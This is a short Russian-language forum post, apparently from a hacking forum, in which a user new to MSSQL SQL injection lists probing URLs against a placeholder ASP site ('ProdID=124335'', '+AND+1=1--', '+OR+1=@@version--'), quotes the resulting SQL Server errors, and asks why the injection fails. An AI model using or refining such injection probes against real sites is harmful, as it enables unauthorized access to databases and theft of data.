Показать сообщение отдельно

  #2  
Старый 30.07.2011, 00:38
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Слабо знаком с SQL-иньекциями в MSSQL.

http://www.site.com/internal.asp?ProdID=124335'

Цитата:
Сообщение от None  
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
http://www.site.com/internal.asp?ProdID=124335--

Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?

http://www.site.com/internal.asp?ProdID=124335+AND+1=1--

Цитата:
Сообщение от None  
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'AND'.
http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--

Цитата:
Сообщение от None  
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'OR'.
Что я делаю не так?
 
Ответить с цитированием